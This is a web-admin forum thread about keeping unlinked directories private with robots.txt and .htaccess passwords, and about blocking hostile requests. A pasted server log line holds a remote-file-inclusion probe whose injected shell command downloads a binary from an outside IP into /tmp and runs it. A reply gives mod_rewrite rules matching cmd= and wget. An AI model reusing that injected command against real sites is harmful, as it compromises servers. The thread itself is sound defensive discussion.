I have a feeling this might be a stupid question, but I haven't been able to find a satisfactory answer anywhere.
I have a couple of directories in the root of my web site which are not referenced in any of the pages on the site (i.e. none of the pages on the site link to the directories or any of the files therein).
My question is: if I add a robots.txt file (one allowing any user agent and disallowing nothing), does that make it possible for a robot to find those directories and their contents? I don't particularly want to advertise their existence by explicitly disallowing them - just in case.
All the pages on the site currently have the <meta name="robots" content="all" /> tag, which I assume is equivalent to the robots.txt file described above, and I'm assuming the directories and their contents can't be found that way. In which case I may have answered my own question, but I'd just like confirmation for peace of mind before I go ahead and add the robots.txt file.
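For clarity, the allow-everything robots.txt I have in mind is just the standard two-line file:

User-agent: *
Disallow: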
Thanks in advance,
Ken.
Disallow rules match anything beginning with the path you specify, so if for example you had a directory called notallowedhere, you could disallow just /notallow. This way it doesn't reveal the full name of the directory, but it will still tell good bots not to try to fetch things from there.
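Put together, a robots.txt using that trick might look like this (notallowedhere is of course just a stand-in for your real directory name):

User-agent: *
Disallow: /notallow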
This of course only works for well behaved bots. If you really want to restrict access, you will have to password protect the files.
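On Apache, a minimal sketch of that would be an .htaccess file in the directory along these lines (the password file path is a placeholder - point it at your own file, created with Apache's htpasswd utility):

# Require a valid login for everything in this directory.
# The AuthUserFile path below is a placeholder.
AuthType Basic
AuthName "Private area"
AuthUserFile /path/to/.htpasswd
Require valid-user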
I'm afraid I'm a little bit paranoid because my log file keeps showing things like this, which I assume are attempts to find and exploit vulnerabilities:
64.50.10.100 - - [05/Mar/2006:05:28:16 +0000] "GET /articles/mambo/index2.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://163.24.84.10/heade.gif?&cmd=cd%20/tmp;wget%20163.24.84.10/chspsp;chmod%20744%20chspsp;./chspsp;echo%20YYY;echo¦ HTTP/1.1" 404 309
64.50.10.100 - - [05/Mar/2006:05:28:23 +0000] "POST /blog/xmlsrv/xmlrpc.php HTTP/1.1" 404 306
Is there anything I can do about these, or do I have to live with them (slightly OT, I know - apologies)?
There is nothing you can do to stop people sending requests like that.
If your server is an Apache server, you could try adding rules to your .htaccess that deny requests like that, but you would have to be careful implementing them, otherwise you could deny legitimate traffic.
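As a rough sketch of the kind of rule I mean (mod_rewrite must be enabled; the patterns here target the remote-URL and shell-command strings visible in your log excerpt, and you should test them carefully before relying on them):

RewriteEngine On
# Reject requests whose query string tries to inject a remote URL
# into a parameter (typical of remote-file-inclusion attempts)...
RewriteCond %{QUERY_STRING} =(https?|ftp):// [NC,OR]
# ...or tries to smuggle shell commands such as wget into a parameter.
RewriteCond %{QUERY_STRING} (cmd=|wget) [NC]
RewriteRule .* - [F]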
For IIS you can run a lockdown utility (Microsoft's IIS Lockdown Tool, for example) that will intercept some of those types of requests, and websites built on the .NET framework include some built-in checks against those kinds of exploits.
Other than that, you just have to make sure that whatever dynamic pages you use verify all GET and POST parameters and reject anything that is not expected/allowed.
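As an illustration of that whitelist approach (sketched in Python for brevity; the names ALLOWED_OPTIONS and validate_params are made up for the example, and the same idea applies in PHP or anything else):

import re

# Hypothetical whitelist of the values your pages actually accept.
ALLOWED_OPTIONS = {"com_content", "com_search"}
# Itemid must be a short, purely numeric ID.
ITEMID_PATTERN = re.compile(r"^\d{1,6}$")

def validate_params(params):
    """Return True only if every expected parameter has an allowed value."""
    if params.get("option") not in ALLOWED_OPTIONS:
        return False
    if not ITEMID_PATTERN.match(params.get("Itemid", "")):
        return False
    return True

Anything that fails the check gets rejected outright (a 400 or 403 response) instead of being passed to the rest of the page.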